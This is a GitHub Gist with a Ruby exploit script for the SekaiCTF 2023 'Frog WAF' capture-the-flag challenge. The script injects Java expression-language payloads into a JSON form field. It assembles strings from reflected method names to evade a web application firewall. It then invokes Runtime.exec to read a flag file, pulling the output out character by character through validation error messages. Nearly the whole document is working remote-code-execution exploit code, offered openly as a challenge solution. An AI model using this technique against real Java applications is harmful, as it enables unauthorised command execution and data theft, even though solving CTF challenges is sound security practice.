Last active
August 29, 2023 19:31
-
-
Save maikypedia/db98bc83cc76ec7c82e1a4347c6127ba to your computer and use it in GitHub Desktop.
SekaiCTF 2023 Frog WAF
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
require 'net/http' | |
require 'json' | |
# ENV['http_proxy'] = 'http://127.0.0.1:8080' # Burp Listener | |
$domain = 'frog-waf.chals.sekai.team' | |
$endpoint = "/addContact" | |
$http = Net::HTTP.new($domain) | |
def array_int num | |
("[],"*num)[0...-1] | |
end | |
def send_payload payload | |
data = { | |
"description" => "Maiky", | |
"firstName" => "Maiky", | |
"lastName" => "Maiky", | |
"country" => "${%s}" % [payload] | |
} | |
headers = { | |
'Content-Type' => 'application/json' | |
} | |
response = $http.post($endpoint, data.to_json, headers) | |
return JSON.parse(response.body)["violations"][0]["message"][0...-23] | |
end | |
def get_charlist | |
$charlist = [] | |
while true | |
element = send_payload "[].getClass().getMethods()[[%s].size()]" % [array_int($charlist.length)] | |
if element.length != 0 | |
$charlist << element | |
else | |
break | |
end | |
end | |
end | |
def get_payload_subcall(og_payload,isUpper) | |
search = og_payload | |
completed = 0 | |
payload = "" | |
(0...$charlist.length).each do |line| | |
while completed != og_payload.length | |
if $charlist[line].include?(isUpper ? search.downcase : search) | |
payload += ".concat([].getClass().getMethods()[[" + array_int(line) + "].size()].toString().substring([" + array_int($charlist[line].index(isUpper ? search.downcase : search)) + "].size(),[" + array_int($charlist[line].index(isUpper ? search.downcase : search)+search.length) + "].size()))" | |
completed+=search.length | |
search = og_payload[completed..-1] | |
break | |
else | |
search = search[0..-2] | |
end | |
end | |
end | |
return isUpper ? payload[7..-1]+".toUpperCase()" : payload[7..-1] | |
end | |
# Special chars use -> java.lang.Character | |
def get_special_char(special_char) | |
payload = "([].getClass()["+get_payload("forName")+"]("+get_payload("java.lang.Character")+").getMethods()[[" + array_int(39) + "].size()].invoke(null, ["+array_int(special_char.codepoints[0])+"].size())[[].size()])" | |
end | |
def get_payload(og_payload) | |
sections = og_payload.scan(/[A-Z]+|[a-z\. ]+|\d+|[^\w\d\s]+/) | |
result = "" | |
sections.each do |section| | |
if section.match(/[A-Z]/) | |
result += ".concat(" + get_payload_subcall(section, true) + ")" | |
elsif section.match(/[a-z\. ]/) | |
result += ".concat(" + get_payload_subcall(section, false) + ")" | |
elsif section.match(/\d+/) | |
result += ".concat([" + array_int(section.to_i) + "].size().toString())" | |
elsif section.match(/[^\w\d\s]+/) | |
result += ".concat(" + get_special_char(section) + ")" | |
end | |
end | |
return result[7..-1] | |
end | |
def exec_code code | |
final_payload = "[].getClass()["+get_payload("forName")+"]("+get_payload("java.lang.Runtime")+").getMethods()[[[],[],[],[],[],[]].size()].invoke(null).exec("+ get_payload(code) + ").getInputStream().readAllBytes()" | |
result = "" | |
while true | |
element = send_payload final_payload + "[[%s].size()]" % [array_int(result.length)] | |
if element.length != 0 | |
result += element.to_i.chr | |
puts result | |
else | |
break | |
end | |
end | |
return result | |
end | |
# SETUP THE CHARLIST | |
puts "[+] Setting up the charlist, this may take a while" | |
get_charlist | |
exec_code "cat flag-a6cd856505af7f809c24be3ccdfe5faf.txt" |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment